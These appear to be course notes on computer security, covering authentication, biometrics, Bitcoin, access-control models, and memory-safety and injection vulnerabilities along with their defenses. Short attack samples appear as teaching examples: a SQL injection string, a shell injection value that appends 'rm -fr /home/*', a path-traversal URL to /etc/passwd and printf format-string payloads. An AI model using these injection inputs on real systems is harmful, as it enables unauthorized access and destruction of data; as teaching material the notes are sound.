This method adds an additional layer of security by sending a push notification to the user’s registered device during login attempts. The user must approve the notification to complete authentication, ensuring that even if credentials are compromised, unauthorized access is prevented.

MFA Fatigue occurs when users are overwhelmed by frequent multi-factor authentication (MFA) requests, leading to careless behavior, such as approving authentication requests without proper verification. Attackers can exploit this by repeatedly sending prompts in hopes that the user will approve one out of frustration or by mistake, granting unauthorized access. This type of fatigue can weaken the security benefits of MFA.

Number Matching Authentication:
Number matching authentication is a technique where the user is presented with a randomly generated number on the device they are logging into, and they must confirm by entering the same number on their second factor device (e.g., mobile phone). This prevents unauthorized approval of login attempts, reducing phishing risks.

Risk-Based Authentication (RBA)

Risk-Based Authentication (RBA) is an adaptive security mechanism that dynamically adjusts authentication requirements based on the risk level of a login attempt. Instead of applying the same level of security for every login, RBA evaluates various factors to determine whether additional authentication steps are necessary.

These factors include geolocation, device and browser information, IP address reputation, and behavioral patterns such as the time and frequency of login attempts.

If a user logs in from a familiar device and location, standard authentication may be sufficient. However, if the system detects an unusual login, such as an attempt from a different country or an unfamiliar device, it may prompt the user for additional verification, such as multi-factor authentication (MFA) or email confirmation.

By adapting security measures based on context, RBA enhances account protection while minimizing unnecessary friction for legitimate users. It helps prevent unauthorized access by flagging risky logins and requiring additional verification only when needed. This approach balances security and user convenience, reducing the frequency of MFA prompts for low-risk users while ensuring stronger protections against suspicious login attempts. By intelligently assessing risk in real-time, RBA provides a more seamless yet secure authentication experience.

Adversary-in-the-Middle (AitM) Attacks

Authentication protocols can be vulnerable to Adversary-in-the-Middle (AitM) attacks, also commonly referred to as Man-in-the-Middle (MitM) attacks or Machine-in-the-Middle attacks.

In this attack, a malicious actor intercepts communication between two parties and impersonates each one to the other.

For example, Alice believes she is communicating with Bob, but in reality, she is talking to Mike, the attacker in the middle. At the same time, Mike is also communicating with Bob, relaying messages between them. This allows Mike to observe the conversation without raising suspicion. Once authentication is completed, Mike can either drop Alice and continue communicating directly with Bob while impersonating her or remain in the middle, eavesdropping and altering messages as needed.

Protocols resistant to AitM attacks use trusted key exchange mechanisms to establish an encrypted channel that prevents interception. For instance, in Kerberos, both Alice and Bob receive a session key that is encrypted specifically for each of them. Since the session key remains confidential, Mike cannot access it even if he intercepts their communication.

Public key cryptography, however, requires additional safeguards against AitM attacks. If Mike intercepts a key exchange, he can deceive Bob into thinking he is Alice. To prevent this, Alice must send Bob a signed session key during the key exchange. If Alice’s message is properly digitally signed, Mike will be unable to decrypt the session key or forge a new one, ensuring secure communication between Alice and Bob.

By using cryptographic techniques such as mutual authentication, digital signatures, and secure key exchanges, authentication protocols can effectively defend against Adversary-in-the-Middle attacks, ensuring that communication remains secure and tamper-proof.

Biometric authentication

Biometric authentication is the process of identifying a person based on their physical or behavioral characteristics as opposed to their ability to remember a password or their possession of some device. It is the third of the three factors of authentication: something you know, something you have, and something you are.

It is also fundamentally different than the other two factors because it does not deal with data that lends itself to exact comparisons. For instance, sensing the same fingerprint several times will not likely give you identical results each time. The orientation may differ, the pressure and angle of the finger may result in some parts of the fingerprint appearing in one sample but not the other, and dirt, oil, and humidity may alter the image. Biometric authentication relies on pattern recognition and thresholds: we have to determine whether two patterns are close enough to accept them as being the same.

A false acceptance rate (FAR) is when a pair of different biometric samples (e.g., fingerprints from two different people) is accepted as a match. A false rejection rate (FRR) is when a pair of identical biometric samples is rejected as a match. Based on the properties of the biometric data, the sensor, the feature extraction algorithms, and the comparison algorithms, each biometric device has a characteristic ROC (Receiver Operating Characteristic) curve. The name derives from early work on RADAR and maps the false acceptance versus false rejection rates for a given biometric authentication device. For password authentication, the “curve” would be a single point at the origin: no false accepts and no false rejects. For biometric authentication, which is based on thresholds that determine if the match is “close enough”, we have a curve.

At one end of the curve, we can have an incredibly low false acceptance rate (FAR). This is good as it means we will not have false matches: the enemy stays out. However, it also means the false reject rate (FRR) will be very high. If you think of a fingerprint biometric, the stringent comparison needed to yield a low FAR means that the algorithm will not be forgiving to a speck of dirt, light pressure, or a finger held at a different angle. We get high security at the expense of inconveniencing legitimate users, you may have to present their finger repeatedly for sensing, hoping that it will eventually be accepted.

At the other end of the curve, we have a very low false rejection rate (FRR). This is good since it provides convenience to legitimate users. Their biometric data will likely be accepted as legitimate, and they will not have to deal with the frustration of re-sensing their biometric, hoping that their finger is clean, not too greasy, not too dry, and pressed at the right angle with the correct pressure. The trade-off is that it’s more likely that another person’s biometric data will be considered close enough as well and accepted as legitimate.

Numerous biological components can be measured. They include fingerprints, irises, blood vessels on the retina, hand geometry, facial geometry, facial thermographs, and many others. Data such as signatures and voice can also be used, but these often vary significantly with one’s state of mind (your voice changes if you’re tired, ill, or angry). They are behavioral systems rather than purely physical systems, such as your iris patterns, length of your fingers, or fingerprints, and tend to have lower recognition rates. Other behavioral biometrics include keystroke dynamics, mouse use characteristics, gait analysis, and even cognitive tests.

Regardless of which biometric is used, the important thing to do to make it useful for authentication is to identify the elements that make it different. Most of us have swirls on our fingers. What makes fingerprints different from finger to finger are the various variations in those swirls: ridge endings, bifurcations, enclosures, and other elements beyond that of a gently sloping curve. These features are called minutia. The presence of minutia, their relative distances from each other and their relative positions can allow us to express the unique aspect of a fingerprint as a relatively compact stream of bits rather than a bitmap.

Two important elements of biometrics are robustness and distinctiveness. Robustness means that the biometric data will not change much over time. Your fingerprints will look mostly the same next year and the year after. Your fingers might grow fatter (or thinner) over the years and at some point in the future, you might need to re-register your hand geometry data.

Distinctiveness relates to the differences in the biometric pattern among the population. Distinctiveness is also affected by the precision of a sensor. A finger length sensor will not measure your finger length to the nanometer, so there will be quantized values in the measured data. Moreover, the measurements will need to account for normal hand swelling and shrinking based on temperature and humidity, making the data even less precise. Accounting for these factors, approximately one in a hundred people may have hand measurements similar to yours. A fingerprint sensor may typically detect 40–60 distinct features that can be used for comparing with other sensed fingerprints. An iris scan, on the other hand, will often capture over 250 distinct features, making it far more distinctive and more likely to identify a unique individual.

Some sensed data is difficult to normalize. Here, normalization refers to the ability to align different sensed data to some common orientation. For instance, identical fingers might be presented at different angles to the sensors. The comparison algorithm will have to account for possible rotation when comparing the two patterns. The inability to normalize data makes it difficult to perform efficient searches. There is no good way to search for a specific fingerprint short of performing a comparison against each stored pattern. Data such as iris scans lends itself to normalization, making it easier to find potentially matching patterns without going through an exhaustive search.

In general, the difficulty of normalization and the fact that no two measurements are ever likely to be the same makes biometric data not a good choice for identification. It is difficult, for example, to construct a system that will store hundreds of thousands of fingerprints and allow the user to identify and authenticate themselves by presenting their finger. Such a system will require an exhaustive search through the stored data and each comparison will itself be time-consuming as it will not be a simple bit-by-bit match test. Secondly, fingerprint data is not distinct enough for a population of that size. A more realistic system will use biometrics for verification and have users identify themselves through some other means (e.g., type their login name) and then present their biometric data. In this case, the software will only have to compare the pattern associated with that user.

The biometric authentication process comprises several steps:

  1. Enrollment. Before any authentication can be performed, the system needs to store the user’s biometric data to later use it for comparison. The user will have to present the data to the sensor, distinctive features need to be extracted, and the resulting pattern stored. The system may also validate if the sensed data is of sufficiently high quality or ask the user to repeat the process several times to ensure consistency in the data.

  2. Sensing. The biological component needs to be measured by presenting it to a sensor, a dedicated piece of hardware that can capture the data (e.g., a camera for iris recognition, a capacitive fingerprint sensor). The sensor captures the raw data (e.g., an image).

  3. Feature extraction. This is a signal processing phase where the interesting and distinctive components are extracted from the raw sensed data to create a biometric pattern that can be used for matching. This process involves removing signal noise, discarding sensed data that is not distinctive or not useful for comparisons and determining whether the resulting values are of sufficiently good quality that it makes sense to use them for comparison. A barely-sensed fingerprint, for instance, may not present enough minutia to be considered useful.

  4. Pattern matching. The extracted sample is now compared to the stored sample that was obtained during the enrollment phase. Features that match closely will have small distances. Given variations in measurements, it is unlikely that the distance will be zero, which would indicate a perfect match.

  5. Decision. The “distance” between the sensed and stored samples is now evaluated to decide if the match is close enough. The decision determination decides whether the system favors more false rejects or more false accepts.

Security implications

Several security issues relate to biometric authentication.

Sensing
Unlike passwords or encryption keys, biometric systems require sensors to gather the data. The sensor, its connectors, the software that processes sensed data, and the entire software stack around it (operating system, firmware, libraries) must all be trusted and tamper-proof.
Secure communication and storage
The communication path after the data is captured and sensed must also be secure so that attackers will have no ability to replace a stored biometric pattern with one of their own.
Liveness
Much biometric data can be forged. Gummy fingerprints can copy real fingerprints, pictures of faces or eyes can fool cameras into believing they are looking at a real person, and recordings can be used for voice-based authentication systems.
Thresholds
Since biometric data relies on “close-enough” matches, you can never be sure of a certain match. You will need to determine what threshold is good enough and hope that you do not annoy legitimate users too much or make it too easy for the enemy to get authenticated.
Lack of compartmentalization
You have a finite set of biological characteristics to present. Fingerprints and iris scans are the most popular biometric sources. Unlike passwords, where you can have distinct passwords for each service, you cannot have this with biometric data.
Theft of biometric data
If someone steals your password, you can create a new one. If someone steals your fingerprint, you have nine fingerprints left and then none. If someone gets a picture of your iris, you have one more left. Once biometric data is compromised, it remains compromised.

Bitcoin & Blockchain

Bitcoin is the first blockchain-based cryptocurrency, designed as an open, distributed, and public system. It has no central authority, and anyone can participate in operating the network nodes.

Unlike a centralized system, which places trust in a third party like a bank, Bitcoin aims for complete decentralization. Centralized systems can fail if the trusted entity disappears, makes errors, or engages in fraudulent activity. Bitcoin’s decentralized, distributed ledger helps prevent fraud and central points of failure.

Cryptographic Building Blocks of Bitcoin

Bitcoin employs several core cryptographic concepts:

Hash Pointers

A hash pointer functions similarly to a traditional pointer but includes both the address of the next block and a cryptographic hash of its data. This structure verifies data integrity: altering data changes its hash, signaling tampering.

In Bitcoin’s blockchain, each block contains a hash pointer to the previous block, creating an immutable chain. An attacker attempting to alter data would have to modify every subsequent block, a computationally infeasible task due to Bitcoin’s proof-of-work requirement.

Merkle Trees

Merkle trees efficiently and securely verify large data sets. Each leaf node contains the cryptographic hash of an individual data block (or transaction). Internal nodes contain hashes derived by concatenating and hashing their child nodes' hashes. The process continues recursively, creating a tree structure. At the top of the tree is a single hash, called the Merkle root, summarizing all the transactions or data within the tree.

In Bitcoin, Merkle trees provide several key advantages:

  • Efficient Verification: Nodes can quickly confirm if a particular transaction is included within a block without needing the entire dataset. This verification requires only a minimal amount of data, known as a Merkle proof, significantly reducing computational and bandwidth requirements.

  • Scalability: Merkle proofs allow lightweight nodes, also known as Simplified Payment Verification (SPV) nodes, to verify transactions without storing the full blockchain, making Bitcoin more scalable and accessible.

  • Data Integrity: If a transaction is altered in any way, the change propagates upward, altering the Merkle root. This property makes any tampering immediately detectable by simply checking the Merkle root against the one recorded in the block header.

A Merkle proof consists of the set of hashes required to reconstruct the path from the transaction to the Merkle root. By comparing this reconstructed Merkle root against the root stored in the block header, nodes can efficiently validate transactions.

Public-Key Cryptography & Digital Signatures

Public-key cryptography underpins Bitcoin transactions. Each user generates a public-private key pair. The public key is openly shared, while the private key remains confidential. It’s computationally infeasible to derive the private key from its corresponding public key.

To create a Bitcoin transaction, the sender uses their private key to digitally sign the transaction, proving ownership of the funds being spent. Digital signatures validate message authenticity and integrity, allowing anyone to verify the transaction using the sender’s public key.

The Ledger and Bitcoin Network

Here’s a summary of Bitcoin’s primary concepts and security mechanisms:

Distributed Ledger, Blocks, and Blockchains:

Bitcoin uses a distributed ledger, publicly recording all transactions in blocks cryptographically linked to form a blockchain since its creation in January 2009. Altering a single block would require changing all subsequent blocks, securing transaction history.

No master nodes or ledger copies exist. Anyone can run a Bitcoin node by downloading its software, connecting to known nodes, and performing peer discovery to integrate into the network. Peer discovery is the process by which a node connects to existing nodes, receives lists of additional nodes, and builds a complete view of the network, ensuring robust decentralization and connectivity.

Bitcoin Wallets:

Bitcoin wallets allow users to securely store and manage private keys. Wallets can take various forms, including software wallets (on devices or online), hardware wallets (physical devices), and paper wallets (printed keys).

User Identification (Addresses):

Bitcoin users create identities through public-private key pairs. Bitcoin addresses, derived from hashing public keys, provide a concise, user-friendly representation for transactions. Although public keys already don’t reveal personal identities, addresses further simplify transactions and reduce potential errors, as they are shorter and more manageable than full public keys.

Transaction Components (UTXO Model):

Bitcoin tracks funds through Unspent Transaction Outputs (UTXO). Transactions comprise:

  • Inputs: References to unspent outputs from previous transactions.
  • Outputs: New unspent outputs, assigned to destination addresses.
  • Change: Leftover funds returned to the sender.
  • Fees: Rewards paid to miners for validating transactions.

Double-Spending Problem:

Double spending—using the same Bitcoin in multiple transactions—is prevented by public ledger recording and miner validation, ensuring each Bitcoin is spent once.

Privacy and Anonymity:

Bitcoin transactions are publicly visible, but identities are pseudonymous. Users are identified by addresses rather than personal identities. Enhanced privacy methods include transaction mixers or techniques like CoinJoin.

Block Structure:

Bitcoin blocks include a header (with timestamp, nonce, Merkle root, etc.) and a list of transactions. The header links blocks together, forming the blockchain.

Mining, Proof of Work (PoW), and Bitcoin Halving:

Mining adds new blocks to the blockchain. Miners solve computational puzzles by modifying block header data until its hash is below a specified target. This hash solution (proof of work) requires substantial computational resources, discouraging tampering.

Bitcoin halving occurs approximately every four years, reducing mining rewards by half, impacting mining profitability and controlling Bitcoin supply inflation.

Target Hash & Difficulty Adjustment:

The target hash sets mining difficulty. Bitcoin’s difficulty adjustment algorithm maintains approximately 10-minute intervals between blocks, adjusting complexity based on mining speed and computational power.

When two miners solve blocks simultaneously or attackers propose alternate chains, forks occur. Bitcoin resolves forks by adopting the longest chain with the most cumulative work.

A 51% Attack arises if one entity controls more than half the mining power, risking reversed transactions, double spending, or blocking others, potentially undermining network security.

Access Control

Access control mechanisms manage how resources are accessed by users, processes, and devices, ensuring interactions with resources occur only as authorized. Effective access control involves setting policies, authenticating users, managing privileges, and auditing access events to prevent unauthorized use and security breaches.

Role of the Operating System

The Operating System (OS) functions as the primary gatekeeper for resources like CPU, memory, files, network connections, and devices. Through access control, the OS protects itself and isolates applications from each other. The Trusted Computing Base (TCB)—comprising the OS and supporting hardware—enforces security by managing which processes can access resources and under what conditions.

User Mode and Kernel Mode

Operating systems utilize two primary modes:

User Mode:
Applications operate with limited privileges, preventing direct hardware access and restricting sensitive instructions. Crashes remain isolated within applications, maintaining overall system stability.
Kernel Mode (Supervisor Mode):
Allows code running in kernel mode to manage all hardware and system resources directly, including memory management, hardware interactions, and process scheduling. Errors in kernel mode risk compromising the entire system.
Mode transitions from user mode to kernel mode occur through:
Traps:
Explicit instructions transferring control to kernel mode (e.g., system calls).
Violations:
Unauthorized actions by applications triggering kernel mode intervention.
Interrupts:
Hardware-generated events (e.g., timer signals, network packets) that temporarily pause the execution of a process, prompting the OS to handle immediate tasks.

Protection Rings

Protection Rings establish hierarchical access levels:

  • Ring 0: Highest privileges, reserved for OS kernel operations.
  • Ring 3: Lowest privileges, standard for user applications.

Intermediate rings (Rings 1 and 2) exist but are rarely used today, primarily due to complexity and practicality concerns.

Implementing Access Control

Protection Domains are security boundaries defining resource access permissions for processes or users.

They can be defined by an Access Control Matrix, which is a theoretical framework mapping subjects (users/processes) to objects (files/devices) with associated permissions. However, implementing an access control matrix is not practical due to its large size, complexity, and scalability issues in systems with many users and resources, making it difficult to store, manage, and efficiently query.

Practical implementations simplify this matrix through:

Access Control Lists (ACLs):
Permissions assigned directly to objects, specifying which subjects can perform actions.
Capability Lists:
Permissions associated with subjects, defining allowed actions across multiple objects, clearly specifying what each subject can access.

Unix (POSIX) Access Controls

Unix-like operating systems (e.g., Linux, FreeBSD, macOS) adhere to POSIX standards, which define common system interfaces and access control mechanisms.

Initially designed for simplicity, Unix access controls were compact and designed to use a fixed amount of space within an inode structure, which stores metadata about each file. This inode structure supported only three basic permission categories:

  1. Owner
  2. Group
  3. Others

Permissions include read, write, and execute actions. Although ACLs were later introduced to handle more complex scenarios, the original Unix access control model remains widely used today due to its simplicity and efficiency.

Setuid (Set User ID) allows executing files with the privileges of the file’s owner. While it enables temporary elevated permissions, it must be used carefully due to potential security risks.

Principle of Least Privilege

The principle of least privilege is an essential security concept designed to reduce risk by limiting access rights and permissions.

This principle grants users or programs only the permissions needed for their tasks, minimizing risk. One way to implement this is via privilege separation: splitting programs into components with distinct privileges:

Privileged Component:
Performs critical actions requiring higher permissions.
Unprivileged Component:
Manages non-critical operations with minimal privileges.

Access Control Models

  1. Discretionary Access Control (DAC): Permissions managed by resource owners, offering flexibility but risking security through user errors.

  2. Mandatory Access Control (MAC): Centrally enforced, rigid permissions based on system policies, reducing unauthorized access. MAC includes several specific models such as Multi-Level Security (MLS).

Multi-Level Security (MLS) and the Bell-LaPadula Model

MLS controls access based on user clearance and data classification levels. A primary MLS example is the Bell-LaPadula (BLP) model.

The BLP model focuses on confidentiality, enforcing two rules:

  • Simple Security (No Read Up): Users can’t access data above their clearance level.
  • Star Property (No Write Down): Users can’t write data to a lower security level, preventing data leaks.

Multilateral Security and Lattice Model

Multilateral security controls access using “compartments” or categories of information, ensuring users access only the compartments for which they have explicit authorization. Compartments typically represent separate areas or classifications of information (e.g., projects or departments), where access to one compartment does not imply access to another.

A Lattice Model graphically represents these combined hierarchical and compartmental permissions, effectively managing complex scenarios by visually demonstrating permissible flows of information between compartments and security levels.

Type Enforcement (TE) Model

The Type Enforcement model assigns security labels or “types” to users (subjects) and resources (objects). Permissions are then defined by rules governing how types interact. Instead of individual permissions, access control is enforced by checking if a subject’s type is authorized to perform certain actions on an object’s type.

TE effectively implements an access control matrix by explicitly defining allowed interactions between types (subjects) and resources (objects), providing a structured, manageable, and precise enforcement mechanism. TE provides strong, flexible control, commonly used in security frameworks like SELinux to enforce mandatory access control policies precisely.

Role-Based Access Control (RBAC)

Role-Based Access Control assigns permissions based on organizational roles rather than individual identities. Roles correspond to job functions or positions and include the permissions required to perform associated tasks. Users are assigned to roles, inheriting permissions that match their responsibilities. RBAC simplifies administration, reduces complexity, and enhances security by clearly associating access rights with organizational duties rather than individual users.

Roles differ from groups in that roles directly define permissions tied explicitly to job responsibilities, while groups are simply collections of users often organized for administrative convenience. Groups may be used for assigning permissions, but they often lack the explicit link to job responsibilities that roles enforce. RBAC provides a clearer and more scalable approach by directly linking permissions to organizational roles rather than group membership.

Biba Integrity Model

Unlike the Bell-LaPadula model, which focuses on not leaking secret information, the Biba model focuses on protecting data integrity by preventing unauthorized or untrustworthy modifications:

  • Simple Integrity Property (No Read Down): Prevents users from reading lower-integrity data. For example, a user with high-integrity clearance (such as an auditor) cannot read potentially corrupted or low-integrity data.
  • Star Integrity Property (No Write Up): Prevents low-integrity users from writing to higher-integrity data. For instance, an intern with low-integrity permissions cannot modify critical financial records classified at a higher integrity level.

Chinese Wall Model

The Chinese Wall model mirrors business requirements in certain industries (such as law, banking, and advertising) and is designed to avoid conflicts of interest by restricting user access based on prior interactions, commonly used in financial and consulting environments. It organizes entities into “conflict-of-interest classes,” which group competing organizations together:

  • Simple Security Property: Users accessing data from one entity within a conflict-of-interest class cannot subsequently access data from competing entities within the same class. For example, a consultant who accesses Company A’s sensitive data cannot later access Company B’s competing sensitive data.
  • Star Property: Users can’t write to objects if they’ve accessed conflicting information, preventing data leakage between competing entities. For example, after viewing confidential data from Company A, the consultant cannot input or share information that could inadvertently benefit Company B.

This dynamic enforcement makes the model especially suitable for environments where conflicts of interest are context-sensitive and evolve over time.

Memory Safety: Buffer Overflows, Code Injection, and Control Flow Hijacking

Program hijacking refers to techniques that attackers use to take control of a program to execute unintended operations. One common method is code injection, where attackers insert malicious code into the program, altering its execution flow.

Buffer Overflows

Buffer overflow occurs when a program allocates memory (e.g., an array) but fails to verify that the data being copied fits within the allocated buffer. Excess data spills into adjacent memory, potentially overwriting critical information.

Languages like C, C++, and assembly are particularly vulnerable due to their lack of built-in array bounds checking. For example, the strcpy(char *dest, char *src) function copies data without knowing the destination buffer size.

Stack-based Overflows

How the Stack Works

When executing functions, the operating system allocates memory regions:

  • Text/Data segments: Executable code and static data.
  • Stack: Temporary storage for function parameters, return addresses, and local variables.
  • Heap: Dynamic memory allocation (malloc).

Upon calling a function, the stack stores parameters, a return address, and a saved frame pointer. Local variables reside in a dedicated region called a stack frame.

  • Stack Pointer (SP): Points to the top of the stack, indicating the next free memory location.
  • Frame Pointer (FP): Marks the base of the current stack frame, helping to reference local variables and parameters within the function.

When returning, the program:

  • Restores the stack pointer.
  • Retrieves the previous frame pointer.
  • Returns to the calling address.

Simple Stack Overflow

If a local buffer (e.g., char buf[128]) overflows, it can overwrite adjacent memory, including the return address. Typically, this will overwrite the return address stored on the stack. As a result, when the function attempts to return, execution jumps to an incorrect address, causing a program crash or unintended behavior. This becomes an availability attack as the program no longer works.

Code Injection via Stack Overflow

Attackers can exploit stack overflow vulnerabilities to execute malicious code. By carefully crafting the overflow data, attackers overwrite both the saved frame pointer and the return address on the stack. Specifically, the attacker:

  1. Injects malicious executable code into the buffer.

  2. Overwrites the saved frame pointer and the return address with addresses pointing back to this injected code.

Upon returning from the function, the processor jumps directly to the injected malicious code instead of the legitimate caller function.

NOP Slide (Landing Zone)

Attackers often use a NOP slide (landing zone) to increase their chances of a successful exploit. A NOP slide consists of numerous consecutive “no operation” (NOP) instructions placed before the injected malicious code. This technique allows attackers to be less precise about the exact buffer address:

Even if the overwritten return address points somewhere within the NOP slide, execution will simply slide through the NOPs and eventually execute the malicious payload. This provides flexibility and increases exploit reliability.

Off-by-one Overflow

This subtle error occurs when loops or copy operations exceed buffer bounds by one byte. Common functions causing off-by-one errors include strncpy and loop-based copying logic using incorrect boundary conditions. Although it usually doesn’t directly overwrite the return address, it can overwrite the saved frame pointer or adjacent local variables, potentially redirecting execution upon returning to the caller. An attacker might exploit this vulnerability by carefully adjusting memory contents so that execution flows to attacker-controlled code.

Heap Overflows

Heap overflows affect dynamically allocated memory (malloc). Unlike stack overflows, heap overflows do not directly overwrite return addresses or frame pointers. Instead, attackers exploit heap overflows by corrupting critical data structures, such as function pointers stored in the heap. By modifying these pointers, attackers can redirect execution to their injected malicious code.

Format String Attacks with printf

The printf function formats output based on user-provided strings, containing directives like %s or %d.

Reading Arbitrary Memory

If user-supplied input is mistakenly used directly as a format string, attackers can include additional %x directives, causing printf to read unintended data from the stack.

Example:

printf(user_input); // if user_input = "%x %x %x", printf will print arbitrary stack data.

Writing Arbitrary Memory

The %n directive writes the number of characters printed so far into an address specified by an argument. Attackers can exploit this to write controlled values to arbitrary memory locations, altering program execution flow.

Example:

printf(user_input); // if user_input = "%n", and the stack is manipulated, it writes to an attacker-controlled address.

Defenses Against Hijacking Attacks

Safe Programming Practices

  • Use safer functions (strncpy instead of strcpy).
  • Implement rigorous bounds checking and testing through fuzzing, which involves automated tools repeatedly providing extremely large, malformed, or unexpected input strings to detect potential vulnerabilities.
  • Utilize languages with built-in array bounds checks, such as Java, Python, or C#.

Data Execution Prevention (DEP)

DEP prevents executing code from stack or heap memory regions by marking them as non-executable, supported by hardware (e.g., Intel’s NX bit).

Limitations and DEP Attacks

Attackers may circumvent DEP through:

  • Return-to-libc: This technique involves overwriting the return address to point to an existing, executable library function such as system() in libc. Rather than injecting new malicious code, the attacker manipulates existing system functionality to perform harmful actions.

  • Return Oriented Programming (ROP): ROP involves chaining short instruction sequences (“gadgets”) already present in the executable or libraries. Each gadget ends with a ret instruction, allowing the attacker to sequentially execute these code snippets to perform arbitrary operations without injecting new code.

Address Space Layout Randomization (ASLR)

ASLR randomizes memory locations of code and data segments at program startup, making it difficult for attackers to predict addresses needed for exploits. Programs must be compiled with Position Independent Code (PIC) to utilize ASLR effectively.

Stack Canaries

Stack canaries are special random values placed before return addresses on the stack. If a buffer overflow occurs, it typically overwrites the canary first. The compiler-generated code checks the canary before returning from functions; discrepancies indicate an overflow, preventing return address manipulation.

Stack canaries protect return addresses but do not guard against overwrites affecting local variables or arrays. Compilers mitigate this by allocating arrays above scalar variables on the stack.

Intel’s Control-flow Enforcement Technology (CET)

Intel’s Control-flow Enforcement Technology introduces a shadow stack alongside the main stack, specifically to protect return addresses. This shadow stack is guarded by processor memory protections, preventing unauthorized modifications.

Control-flow instructions simultaneously update both stacks, and during returns, addresses from both stacks are compared. A mismatch triggers a fault, prompting the operating system to terminate the compromised process.

Integer Overflows and Underflows

Integer overflows and underflows occur when arithmetic operations exceed the maximum or minimum representable values for integer types. In signed integers, overflow results in unexpected negative or positive values due to two’s complement representation: a large positive number overflows to the smallest negative number and vice versa.

In unsigned integers, overflow wraps the value around from the maximum to zero, causing unexpected smaller values. Underflow wraps the value from zero to the maximum possible positive value.

Specific Problems Caused by Integer Overflows and Underflows

  • Signed integer overflow: May result in logic errors, unexpected negative values, or incorrect loop behavior, potentially leading to buffer size miscalculations.
  • Unsigned integer overflow: Often leads to unexpectedly small array sizes or memory allocations, facilitating buffer overflow attacks due to insufficient memory allocation.
  • Underflow scenarios: Large positive values when subtracting from zero can cause unintended large memory allocations or logic errors.

Attackers exploit unexpected integer wrapping behavior to manipulate memory allocation, indices, or loop iterations, potentially leading to code execution or denial of service.

Command Injection

Command injection occurs when attackers manipulate inputs to execute arbitrary commands in a command interpreter. This includes attacks targeting shell commands, databases, or interpreted languages.

SQL Injection

SQL injection attacks occur when user input directly becomes part of an SQL command, allowing attackers to alter the intended SQL logic.

For example:

sprintf(buf, "SELECT * FROM logininfo WHERE username = '%s' AND password = '%s';", uname, passwd);

If a user inputs:

' OR 1=1 --

the resulting query bypasses authentication:

SELECT * FROM logininfo WHERE username = '' OR 1=1 -- AND password = '';

Mitigation Strategies

One basic mitigation is to escape special characters in user inputs to prevent them from altering SQL statements. However, escaping characters manually is error-prone and can introduce vulnerabilities if not done properly.

A more robust mitigation is to use parameterized queries, ensuring user inputs cannot directly alter the structure of the SQL command:

Example: (using Python with SQLite)

import sqlite3
conn = sqlite3.connect('users.db')
cursor = conn.cursor()

cursor.execute("SELECT * FROM logininfo WHERE username=? AND password=?", (uname, passwd))

Parameterized queries clearly separate user input from the command structure, effectively preventing SQL injection.

Shell Attacks

Shell scripts (sh, bash, csh, etc.) are commonly exploited via command injection.

system() and popen() Vulnerabilities

C programs frequently use system() and popen() to run shell commands. Improper validation allows attackers to execute arbitrary commands. For example:

char command[BUFSIZE];
snprintf(command, BUFSIZE, "/usr/bin/mail –s \"system alert\" %s", user);
FILE *fp = popen(command, "w");

If the attacker inputs:

nobody; rm -fr /home/*

The resulting executed command becomes:

sh -c "/usr/bin/mail -s \"system alert\" nobody; rm -fr /home/*"

Python’s subprocess.call Vulnerabilities

Python’s subprocess.call is also vulnerable when used improperly:

import subprocess
subprocess.call("echo " + user_input, shell=True)

If user_input is not sanitized, attackers can execute arbitrary commands.

To safely sanitize input in POSIX shells, Python provides shlex.quote():

import subprocess, shlex
safe_input = shlex.quote(user_input)
subprocess.call("echo " + safe_input, shell=True)

Note that shlex.quote() is only suitable for POSIX-compatible shells and does not provide cross-platform protection.

Environment Variable Manipulation

Manipulating the PATH environment variable allows attackers to run malicious commands placed in writable directories appearing before safe directories.

Additionally, variables like ENV or BASH_ENV may execute arbitrary scripts whenever a non-interactive shell starts.

Shared Library Injection

LD_PRELOAD (Linux)

LD_PRELOAD is an environment variable that specifies shared libraries to load before all others when running a program. It can be used for function interposition, which means intercepting and potentially overriding standard library functions. Attackers exploit this by preloading malicious libraries containing functions with the same names as legitimate ones, causing the malicious versions to be executed instead of the original implementations.

DLL Sideloading (Windows)

DLL sideloading is similar to LD_PRELOAD. Windows programs often load DLLs dynamically at runtime. Attackers exploit this by placing malicious DLLs with the same name as legitimate ones in directories where Windows searches for dependencies first (e.g., the program’s current directory). When the legitimate program runs, it inadvertently loads the malicious DLL, executing attacker-controlled code.

Microsoft .LNK File Vulnerabilities

Microsoft shortcut files (.LNK) can execute arbitrary commands or load malicious libraries when a user simply views them in Windows Explorer. Attackers exploit this behavior to distribute malware or execute unauthorized commands.

Path Traversal and Path Equivalence Vulnerabilities

Path Traversal Vulnerabilities

Path traversal vulnerabilities occur when attackers use input containing special characters such as ../ to navigate to directories or files that they should not have access to. This allows attackers to read, modify, or execute unauthorized files.

Path Equivalence Vulnerabilities

Path equivalence vulnerabilities exploit the fact that a single resource can be referenced by multiple different representations, such as symbolic links or encoded paths. Attackers use alternative representations to bypass security controls and gain unauthorized access.

For example, attackers attempt access with URLs like:

http://example.com/../../../etc/passwd

Proper validation and canonicalization are essential to prevent both types of attacks.

File Descriptor Vulnerabilities

File descriptor vulnerabilities occur when programs improperly handle the standard file descriptors (0: stdin, 1: stdout, 2: stderr). Attackers can exploit situations where these descriptors are unexpectedly closed or redirected:

  • An attacker closes a standard file descriptor before executing a privileged program, causing the program to inadvertently open a sensitive file with that descriptor number. For example:
./privileged_program >&-

This command closes the stdout descriptor, causing the next file opened by the privileged program to inherit descriptor 1 (stdout). As a result, the program may unintentionally write sensitive output data to unintended files.

Proper validation of file descriptor states and explicit descriptor management can mitigate this type of vulnerability.

TOCTTOU (Time of Check to Time of Use) Attacks

TOCTTOU vulnerabilities occur when a resource’s security properties change between the time they are checked and when they are used, allowing race conditions. A classic example:

  1. A privileged program checks the permissions of a temporary file created with mktemp.
  2. Before the program uses the temporary file, an attacker replaces it with a symbolic link pointing to a sensitive file, such as /etc/passwd.
  3. The program then opens or modifies the sensitive file, causing unauthorized access or damage.

Using secure functions like mkstemp() or mkdtemp() that securely create and open temporary files mitigates this vulnerability.

Unicode Parsing Vulnerabilities

Incorrect parsing of Unicode characters can lead to bypassing access restrictions. For example, Microsoft’s IIS server failed to correctly handle multi-byte Unicode characters, allowing attackers to circumvent security checks and access files or execute commands.

Comprehension Errors

Security vulnerabilities often result from comprehension errors where developers misunderstand the nuances of system operations or APIs. Examples include:

  • Incorrectly sanitizing special characters.
  • Misunderstanding system APIs like CreateProcess() or file descriptor behavior.

Proper understanding and thorough validation practices are essential to avoid these errors.

Application confinement

Access control, while essential, is not always sufficient for securing modern systems. Traditional access control mechanisms, modeled on an access matrix, do not address restricting the operations of individual processes. For the most part, they assume that a process has the full authority of the user’s ID under which it executes.

